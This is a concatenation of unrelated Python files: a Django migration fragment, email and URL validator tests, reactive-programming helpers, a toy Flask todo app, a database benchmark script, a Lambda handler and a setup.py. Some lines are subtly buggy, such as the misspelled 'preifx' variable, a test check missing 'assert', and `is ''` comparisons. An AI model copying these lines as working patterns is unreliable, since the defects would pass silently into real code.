fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('width', models.PositiveIntegerField()),
('height', models.PositiveIntegerField()),
],
),
migrations.RemoveField(
model_name='clip',
name='height',
),
migrations.RemoveField(
model_name='clip',
name='width',
),
]
|
import re
from flatland import String
from flatland.validation import (
IsEmail,
HTTPURLValidator,
URLCanonicalizer,
URLValidator,
)
from flatland.validation.network import _url_parts
from tests._util import eq_
def email(value):
return String(value, name='email', strip=False)
def assert_email_not_valid(value, kw={}):
validator = IsEmail(**kw)
el = email(value)
assert not validator.validate(el, None)
assert el.errors
def assert_email_valid(value, kw={}):
validator = IsEmail(**kw)
el = email(value)
assert validator.validate(el, None)
assert not el.errors
def test_email():
for addr in (u'bob@noob.com', u'bob@noob.frizbit', u'#"$!+,,@noob.c',
u'bob@bob-bob.bob'):
yield assert_email_valid, addr
def test_email_idna():
assert_email_valid(u'bob@snow\u2603man.com')
def test_email_nonlocal():
assert_email_not_valid(u'root@localhost')
def test_email_nonlocal_ok():
assert_email_valid(u'root@localhost', {'nonlocal': False})
def test_email_altlocal():
override = dict(local_part_pattern=re.compile(r'^bob$'))
assert_email_valid('bob@bob.com', override)
assert_email_not_valid('foo@bar.com', override)
def test_email_bogus():
c64 = u'x' * 64
c63 = u'x' * 63
for addr in (u'bob@zig..', u'bob@', u'@bob.com', u'@', u'snork',
u'bob@zig:zag.com', u'bob@zig zag.com', u'bob@zig/zag.com',
u' @zig.com', u'\t\t@zag.com',
u'bob@%s.com' % c64,
u'bob@%s.%s.%s.%s.com' % (c63, c63, c63, c63),
u'foo.com', u'bob@bob_bob.com', u''):
yield assert_email_not_valid, addr
def scalar(value):
return String(value, name='test')
def test_url_validator_default():
v = URLValidator()
el = scalar('http://me:you@there/path#fragment')
assert v.validate(el, None)
assert not el.errors
def test_url_validator_schemes():
v = URLValidator(allowed_schemes=(), blocked_scheme='X')
el = scalar('http://me:you@there/path#fragment')
assert not v.validate(el, None)
eq_(el.errors, ['X'])
v = URLValidator(allowed_schemes=('https',), blocked_scheme='X')
el = scalar('http://me:you@there/path#fragment')
assert not v.validate(el, None)
eq_(el.errors, ['X'])
def test_url_validator_parts():
v = URLValidator(allowed_parts=(), blocked_part='X')
el = scalar('http://me:you@there/path#fragment')
assert not v.validate(el, None)
eq_(el.errors, ['X'])
v = URLValidator(allowed_parts=_url_parts)
el = scalar('http://me:you@there/path#fragment')
assert v.validate(el, None)
assert not el.errors
v = URLValidator(allowed_parts=('scheme', 'netloc'))
el = scalar('http://blarg')
assert v.validate(el, None)
assert not el.errors
v = URLValidator(allowed_parts=('scheme', 'netloc'), blocked_part='X')
el = scalar('http://blarg/')
assert not v.validate(el, None)
eq_(el.errors, ['X'])
def test_http_validator_default():
v = HTTPURLValidator(forbidden_part='X')
el = scalar('http://there/path#fragment')
assert v.validate(el, None)
assert not el.errors
el = scalar('http://phis:ing@there/path#fragment')
not v.validate(el, None)
eq_(el.errors, ['X'])
def test_url_canonicalizer_default():
v = URLCanonicalizer()
el = scalar('http://localhost/#foo')
eq_(el.value, 'http://localhost/#foo')
assert v.validate(el, None)
eq_(el.value, 'http://localhost/')
assert not el.errors
def test_url_canonicalizer_want_none():
v = URLCanonicalizer(discard_parts=_url_parts)
el = scalar('http://me:you@there/path#fragment')
eq_(el.value, 'http://me:you@there/path#fragment')
assert v.validate(el, None)
eq_(el.value, '')
assert not el.errors
def test_url_canonicalizer_want_one():
v = URLCanonicalizer(discard_parts=_url_parts[1:])
el = scalar('http://me:you@there/path#fragment')
eq_(el.value, 'http://me:you@there/path#fragment')
assert v.validate(el, None)
eq_(el.value, 'http://')
assert not el.errors
def test_url_canonicalizer_want_all():
v = URLCanonicalizer(discard_parts=())
el = scalar('http://me:you@there/path#fragment')
eq_(el.value, 'http://me:you@there/path#fragment')
assert v.validate(el, None)
eq_(el.value, 'http://me:you@there/path#fragment')
assert not el.errors
|
from typing import Any, Callable, Iterable, Sequence, Tuple
from stateflow import reactive
from stateflow.common import ev
from stateflow.notifier import Notifier, ScopedName, many_notifiers
def get_subnotifier(self: Notifier, name: str) -> Notifier:
if name is None or name is '':
return self.__notifier__
if not hasattr(self, '_subnotifiers'):
setattr(self, '_subnotifiers', dict())
return self._subnotifiers.setdefault(name, Notifier("subnotifier " + name))
def observable_method(unbound_method, observed: Sequence[str], notified: Sequence[str]):
# @reactive(other_deps=[get_subobservable observed)
if isinstance(unbound_method, str):
unbound_method = forward_by_name(unbound_method)
@reactive(pass_args=[0], dep_only_args=['_additional_deps'])
def wrapped(self, *args, **kwargs):
with many_notifiers(*[get_subnotifier(self, observable) for observable in notified]):
res = unbound_method(ev(self), *args, **kwargs)
return res
def wrapped2(self, *args, **kwargs):
return wrapped(self, *args, **kwargs,
_additional_deps=[get_subnotifier(self, obs) for i, obs in enumerate(observed)])
return wrapped2
def notifying_method(unbound_method, notified: Sequence[str]):
if isinstance(unbound_method, str):
unbound_method = forward_by_name(unbound_method)
def wrapped(self, *args, **kwargs):
res = unbound_method(ev(self), *args, **kwargs)
for observable in notified:
get_subnotifier(self, observable).notify_observers()
return res
return wrapped
def getter(unbound_method, observed):
return observable_method(unbound_method, observed=observed, notified=[])
def reactive_setter(unbound_method, notified):
return observable_method(unbound_method, observed=[], notified=notified)
def forward_by_name(name):
def func(self, *args, **kwargs):
return getattr(self, name)(*args, **kwargs)
return func
def add_reactive_forwarders(cl: Any, functions: Iterable[Tuple[str, Callable]]):
"""
For operators and methods that don't modify a state of an object (__neg_, etc.).
"""
def add_one(cl: Any, name, func):
def wrapped(self, *args):
@reactive # fixme: we should rather forward to the _target, not to __eval__
def reactive_f(self_unwrapped, *args):
return func(self_unwrapped, *args)
prefix = ''
if hasattr(self, '__notifier__'):
preifx = self.__notifier__.name + '.'
with ScopedName(name=preifx + name, final=True):
return reactive_f(self, *args)
setattr(cl, name, wrapped)
for name, func in functions:
add_one(cl, name, func)
def add_assignop_forwarders(cl: Any, functions: Iterable[Tuple[str, Callable]]):
"""
For operators like '+=' and one-arg functions like append, remove
"""
def add_one(cl: Any, name, func):
def wrapped(self, arg1):
target = self._target()
self_unwrapped = target.__eval__()
target.__assign__(func(self_unwrapped, arg1))
return self
setattr(cl, name, wrapped)
for name, func in functions:
add_one(cl, name, func)
def add_notifying_forwarders(cl: Any, functions: Iterable[Tuple[str, Callable]]):
"""
For operators like '+=' and one-arg functions like append, remove
"""
def add_one(cl: Any, name, func):
def wrapped(self, *args):
target = self._target()
self_unwrapped = target.__eval__()
with target.__notifier__:
res = func(self_unwrapped, *args)
return res
setattr(cl, name, wrapped)
for name, func in functions:
add_one(cl, name, func)
|
from flask import Flask, render_template, request, redirect, url_for
import uuid
class Task:
def __init__(self, task):
self.id = uuid.uuid1().hex
self.task = task
self.status = 'active'
self.completed = False
def toggle(self):
if self.status == 'active':
self.status = 'completed'
self.completed = True
else:
self.status = 'active'
self.completed = False
# Global state, yay!
tasks = {}
app = Flask(__name__)
app.debug = True
@app.route('/')
def index():
return render_template('index.html', tasks=tasks)
@app.route('/todos', methods = ['POST'])
def todos():
task = Task(task=request.form['item-text'])
tasks[task.id] = task
return redirect(url_for('index'))
@app.route('/delete', methods = ['POST'])
def delete_todos():
del(tasks[request.form['id']])
return redirect(url_for('index'))
@app.route('/toggle', methods = ['POST'])
def toggle_todo():
tasks[request.form['id']].toggle()
return redirect(url_for('index'))
if __name__ == '__main__':
app.run()
|
import random, time, logging
from string import ascii_uppercase
random.seed(0)
logging.basicConfig(filename='./stats.log', level=logging.INFO)
def reset_db(db):
db.collection("work_batches").delete({})
db.queries.delete({})
db.models.delete({})
db.executables.delete({})
db.properties.delete({})
def timer(*args):
db = args[0]
function = args[1]
args = args[2:]
db.request("GET", "timer/on", {})
t0 = time.time()
res = function(*args)
t1 = time.time()
reports = db.request("GET", "timer", {})['reports']
pretty_print(reports)
db.request("GET", "timer/off", {})
return t1 - t0, res
def pretty_print(reports):
for k,v in reports.items():
if v['total_time'] == None:
v['total_time'] = 0.
for k,v in sorted(reports.items(), key=lambda r: r[1]['total_time'], reverse=True):
try:
if (v['total_time'] > 0):
print('%s %f %i %f %f'%(k, v['total_time'], v['count'], v['percent_time'], v['average_time']))
except:
continue
def commit(db, collection, sizes, numbers, obj={}, required_fields=[]):
for size in sizes:
for number in numbers:
print('Committing %i %s with size %i\n'%(number, collection, size))
objs = []
for i in range(number):
new_obj = obj.copy()
new_obj["size"] = size
new_obj["number"] = number
new_obj["index"] = i
new_obj["data"] = ''.join('a' for i in range(size))
for field in required_fields:
new_obj[field] = str(size)+"_"+str(number)+"_"+str(i)
objs.append(new_obj)
t, res = timer(db, db.collection(collection).commit, objs)
logging.info('%s commit %i %i %f', collection, number, size, t)
assert len(res['ids']) == number
print('Finished in %f seconds\n'%(t))
def count(db, collection, sizes, numbers, filter={}):
for size in sizes:
for number in numbers:
print('Counting %i %s with size %i\n'%(number, collection, size))
if collection == 'properties':
new_filter = {
"params.size": size,
"params.number": number
}
else:
new_filter = {
"size": size,
"number": number
}
t, res = timer(db, db.collection(collection).count, new_filter)
logging.info('%s count %i %i %f', collection, number, size, t)
assert res == number
print('Finished in %f seconds\n'%(t))
def query_collection(db, collection, sizes, numbers, filter={}):
for size in sizes:
for number in numbers:
print('Querying %i %s with size %i\n'%(number, collection, size))
if collection == 'properties':
new_filter = {
"params.size": size,
"params.number": number
}
else:
new_filter = {
"size": size,
"number": number
}
t, res = timer(db, db.collection(collection).query, new_filter)
logging.info('%s query %i %i %f', collection, number, size, t)
if collection == 'properties':
assert len(res) == number*number
else:
assert len(res) == number
print('Finished in %f seconds\n'%(t))
def update(db, collection, sizes, numbers, filter={}, update={}):
for size in sizes:
for number in numbers:
print('Updating %i %s with size %i\n'%(number, collection, size))
new_filter = filter.copy()
new_filter = {
"size": size,
"number": number
}
new_update = update.copy()
new_update = {
"new_field": str(size)+"_"+str(number)
}
t, res = timer(db, db.collection(collection).update, new_filter, new_update)
logging.info('%s update %i %i %f', collection, number, size, t)
assert res == number
print('Finished in %f seconds\n'%(t))
def stats(db, collection, sizes, numbers, filter={}):
for size in sizes:
for number in numbers:
print('Computing stats %i %s with size %i\n'%(number, collection, size))
new_filter = filter.copy()
new_filter["size"] = size
new_filter["number"] = number
field = "size"
t, res = timer(db, db.collection(collection).stats, field, new_filter)
logging.info('%s stats %i %i %f', collection, number, size, t)
assert res["count"] == number
print('Finished in %f seconds\n'%(t))
def mapreduce(db, collection, sizes, numbers, filter, mapper, reducer, finalizer):
print("NOT YET IMPLEMENTED")
def submit(db, sizes, numbers, filters={}):
for size in sizes:
for number in numbers:
print('Submitting %i queries with size %i\n'%(number*number, size))
new_filters = filters.copy()
if not 'input_model' in new_filters:
new_filters['input_model'] = {}
new_filters['input_model']['size'] = size
new_filters['input_model']['number'] = number
if not 'executable' in new_filters:
new_filters['executable'] = {}
new_filters['executable']['size'] = size
new_filters['executable']['number'] = number
if not 'params' in new_filters:
new_filters['params'] = {}
new_filters['params']['size'] = size
new_filters['params']['number'] = number
new_filters['params']['run_time'] = 1.0
t, res = timer(db, db.submit, new_filters)
logging.info('root submit %i %i %f', number, size, t)
assert res['total'] == number*number
print('Finished in %f seconds\n'%(t))
def query(db, sizes, numbers, filters={}):
for size in sizes:
for number in numbers:
print('Querying %i items with size %i\n'%(number*number, size))
new_filters = filters.copy()
if not 'input_model' in new_filters:
new_filters['input_model'] = {}
new_filters['input_model']['size'] = size
new_filters['input_model']['number'] = number
if not 'executable' in new_filters:
new_filters['executable'] = {}
new_filters['executable']['size'] = size
new_filters['executable']['number'] = number
if not 'params' in new_filters:
new_filters['params'] = {}
new_filters['params']['size'] = size
new_filters['params']['number'] = number
new_filters['params']['run_time'] = 1.0
t, res = timer(db, db.query, new_filters)
logging.info('root query %i %i %f', number, size, t)
assert len(res) == number*number
print('Finished in %f seconds\n'%(t))
|
import os
def lambda_handler(event, context):
return "{} from Lambda!".format(os.environ['greeting from lambda'])
|
#!/usr/bin/env python
# coding: utf-8
import os
import re
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
def load_readme():
with open(os.path.join(here, 'README.rst')) as f:
return f.read()
setup(
name='addon_sample',
version=re.search(
r'__version__\s*=\s*[\'"]([^\'"]*)[\'"]', # It excludes inline comment too
open('addon_sample/__init__.py').read()).group(1),
packages=find_packages(exclude=['tests*'])
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.